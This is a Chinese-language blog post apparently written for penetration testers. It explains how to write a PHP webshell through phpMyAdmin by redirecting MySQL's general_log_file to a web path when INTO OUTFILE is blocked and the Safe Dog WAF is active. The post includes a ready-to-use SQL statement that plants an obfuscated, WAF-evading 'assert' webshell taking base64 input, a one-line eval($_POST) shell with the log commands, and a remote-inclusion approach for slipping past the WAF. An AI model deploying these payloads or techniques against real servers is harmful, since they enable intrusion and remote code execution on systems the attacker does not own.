旁白:在一個有WAF、並且mysql中的Into outfile禁用的情況下,我該如何getshell?
作者:傾旋
email:payloads@aliyun.com
投稿聯系:service@cora-lab.org
原文地址:http://blog.cora-lab.org/287.html
例外一篇:https://www.t00ls.net/thread-38892-1-1.html
首先環境如下:
- OS:Windows 2003
- WAF:Safe Dog 4.0正式版
- phpmyadmin:4.7(許多都可以)
- Mysql:5.5+
- PHP:5.3
- Apache:2.x
目前into outfile已經被禁用,並且WAF也會在寫入文件的時候攔截。
那么我們嘗試通過一個腦洞大開的方法去getshell。(必須是mysql root權限)
登錄phpmyadmin后,查看全局變量:
找到 general log file
找到 general log file
這里是存儲了每一個sql語句執行的日志(包含SQL語句本身)
但是general log變量必須是ON狀態,代表啟用。
此時我們把general log開啟為ON,然后再去更改general log file的地址為我們的webshell絕對路徑。
在每一次更改general log file的時候mysql都會判斷日志文件是否存在,如果不存在則會自動創建。
此時該文件已經創建,並且文件內容保存了最后一條SQL語句的日志信息。
MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
121 Query SHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
121 Quit
接下來,我們直接隨意查詢SQL,每一句都會被寫入這個shell.php
由於有WAF,我們采用遠程包含的形式來運行webshell。
在我們的遠程地址里,放置函數名,使服務器端訪問它,然后加載到內存,直接去調用此函數,再去接收我們提交的php代碼。
關於菜刀免殺,請看上一篇文章。
下面再附上一個SQL查詢免殺shell的語句,方便大家遇到此類情況直接利用:
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
可見這邊並沒有攔截:
文章就到這里啦,這幾天比較忙,都沒有怎么更新,感謝大家一直以來的支持!
| set global general_log='on'; SET global general_log_file='/var/wwwcmd.php'; SELECT '<?php @eval($_POST[x]);?>'; |